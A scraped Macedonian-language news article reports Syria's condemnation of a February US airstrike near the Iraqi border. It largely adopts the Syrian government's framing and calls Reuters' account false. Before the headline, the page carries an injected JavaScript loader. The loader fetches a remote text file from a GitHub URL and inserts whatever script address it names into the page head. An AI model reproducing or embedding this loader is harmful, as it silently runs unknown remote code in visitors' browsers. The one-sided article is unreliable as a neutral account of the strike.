;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Меѓународно право или закон на џунгла е новата уредба на Бајден? - Антропол
АктуелноИнтернационално

Меѓународно право или закон на џунгла е новата уредба на Бајден?

Министерството за надворешни работи на Сириска Арапска Република остро го осуди воздушниот напад нанесен од американското воено воздухопловство врз пограничните области на земјата, во близина на границата со Ирак, и бара од администрацијата на американскиот претседател  Џо Бајден да запре политички курс „во духот на екс-американскиот претседател Доналд Трамп“.

„Сирија категорично го осудува тајниот напад нанесен од американската авијација во регионот на провинцијата Деир аз-Зор, недалеку од границата со Ирак. Оваа акција претставува грубо кршење на суверенитетот на земјата и непочитување на меѓународното право и мировните договори, што доведува до влошување на состојбата во регионот“- изјавија од сириското МНР за новинската агенција„ Сана “.

Министерството за надворешни работи на Сириска Арапска Република овој воздушен напад на територијата на Сирија го опиша како карактеристичен показател за целата американска политика во регионот. Од сириското МНР појаснија дека тие очекувале поинаков пристап кон Блискиот исток од новата администрација, во надеж дека политичкиот курс на САД ќе биде изграден во строга согласност со меѓународното право, а не со „законите на џунглата“ – како што беше случај за време на управувањето од претходната администрација. Сепак, се чини дека приодите на американската администрација воопшто не се променија под новиот претседател, и, ако тие се променија, тогаш тоа е „само на полошо“, заклучија од одделот.

Од сириската страна изразија надеж дека САД ќе го напуштат својот непријателски однос кон земјата и нејзината власт.  Повикувајќи да престане подршката (вклучително и финансиска), која ја добиваат терористичките групи од страна на САД, кои дејствуваат во земјата и поради непознати причини се нарекуваат „опозиција“ од страна на Белата куќа. Покрај тоа, тие истакнаа дека „овие групи се терористички не само во однос на владата и владините сили, туку и на целиот сириски народ“.

Како што веќе е извесно, во раните утрински часови на 26 февруари, Пентагон извести дека американското воено воздухопловство „според указот на претседателот Џо Бајден“ извршен е воздушен напад врз одредени „цели“ лоцирани на исток од сириската територија, и овие цели во Пентагон беа опишани како припадници на „екстремистичките сили“ … Покрај тоа, Пентагон виде „проиранска трага“ во акциите на неименувани „екстремистички“ групи, без да обезбеди докази, какви што се потребни за таквите случаи.

Пред Пентагон да ја преземе одговорноста за бомбардирањето на сириската територија, првите информации сириската страна ги доби од извештајот на новинарската агенција „REUTERS“, која, повикувајќи се и на некои „информативни“ извори, забележа дека целите што биле бомбардирани од американски авиони биле поврзани со некои „проирански терористички формации“ кои дејствувале во земјата. Во меѓувреме, познато е дека воени специјалисти од Исламската Република Иран, официјално поканети од сириска страна, всушност работат во Сирија, но во Сирија нема никакви „терористички формации“ поврзани со Иран. – Затоа оваа порака на новинската агенција, за жал, е лажна.

Докази за американско бомбардирање на сириска територија даде Телеграм каналот на ирачката новинска агенција „Saberin-News“, исто така поврзан со Арапските сили на отпор. Во оваа порака се вели дека американскиот авион ги извршил воздушните напади на „целите“ меѓу населбите Абу Кемал и Ал-Каим. Оваа порака исто така го спомена присуството на жртви како резултат на бомбардирањето. Покрај тоа, „Saberin-News“ објави дека е нападната една структура, поврзана со ирачките сили на отпор, но зградата за време на бомбардирањето, за среќа, била празна и немало жртви како резултат на овој воздушен напад.

Дури после овие информации следеше извештајот на Пентагон (за кој сириската страна смета дека е лажен), заедно со извештаите на некои западни новинарски агенции, во кој беше известено дека бомбардирањата „со декрет на претседателот на САД“ биле извршени заради некои „проирански цели“.